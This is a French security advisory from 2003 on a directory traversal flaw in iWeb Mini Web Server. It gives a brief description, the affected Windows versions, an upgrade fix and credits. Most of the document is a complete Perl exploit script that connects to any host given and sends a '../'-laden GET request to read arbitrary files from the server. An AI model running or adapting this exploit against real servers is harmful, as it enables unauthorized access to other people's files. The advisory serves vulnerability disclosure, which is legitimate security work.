Date de Publication: 2003-04-16
 Titre: iWeb Mini Web Server Remote Directory Traversal
 K-Otik ID : 0020
 Exploitable à distance : Oui
 Exploitable en local : Non

 
  * Description Technique - Exploit *

iWeb Mini Web Server est un serveur web utilisé pour l'intranet et les tests web dans un environnement réel. iWeb ne filtre pas correctement les requêtes GET pour le caractère ../ ce qui permet d'aller au delà le répertoire web, et tout ceci grâce à une simple url.

.....:[ Exploit ]:.....

#!/usr/bin/perl -w
# S e c u r i t y F r e a k s
#   www.securityfreaks.com
# iWeb Mini Web Server Remote Directory Traversal
# subversive[at]linuxmail.org - *15/04/2003*

use IO::Socket;

if(!$ARGV[0]) {
print <<"IWEBSUK";

   S e c u r i t y F r e a k s
     www.securityfreaks.com

  -------------------------------------------------------------
  SF-iwsuk.pl - iWeb Mini Web Server Remote Directory Traversal
  -------------------------------------------------------------
  Usage: $0 <host> <file> <port>


IWEBSUK
exit;
}
else{
$host = $ARGV[0];
}
if(!$ARGV[2]) {
$port = "80";
}
else {
$port = $ARGV[2];
}
my $sock = new IO::Socket::INET ( Proto => "tcp",
                                  PeerAddr => $host,
                                  PeerPort => $port,
                                );
die "\nConnection to $host:$port failed\n" unless $sock;

print $sock "GET /../../../../../../../../../$ARGV[1] HTTP/1.0\n\n";
while(<$sock>) { print }
close($sock);
print("\n\n");
exit;


  * Versions Vulnérables *
 
Plateformes Windows NT/XP/9x
 

  * Solution *
 
Utiliser la nouvelle version de iWeb : http://ashleybrown.co.uk/

 
  * Crédits *
 
 Faille découverte par subversive et l'équipe de securityfreaks (Avril 2003).